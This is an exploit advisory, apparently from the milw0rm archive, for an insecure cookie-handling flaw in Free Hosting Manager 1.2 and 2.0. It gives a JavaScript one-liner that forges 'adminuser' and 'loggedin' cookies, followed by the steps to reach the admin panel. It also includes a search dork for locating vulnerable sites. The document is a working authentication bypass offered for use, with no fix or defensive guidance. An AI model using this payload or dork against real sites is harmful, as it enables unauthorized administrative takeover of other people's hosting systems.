######################################################################### # # #Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability# # # ######################################################################### # # # AUTHOR : Scary-Boys # # HOME : http://scary-boys.com # # Founded By : lvlr-Erfan # # Download : http://www.fhm-script.com/download.php # # # ######################################################################### # # # DorKs : "Powered By Free Hosting Manager" # # # ######################################################################### # # # DESCRIPTION : # # the admin panel only checks if the cookie exists. # # # ######################################################################### # # # Vulnerability : # # # # javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/"; # # ######################################################################### # # # after running the javascript, Go to "/admin" & Refresh # # # ######################################################################### # milw0rm.com [2008-08-06]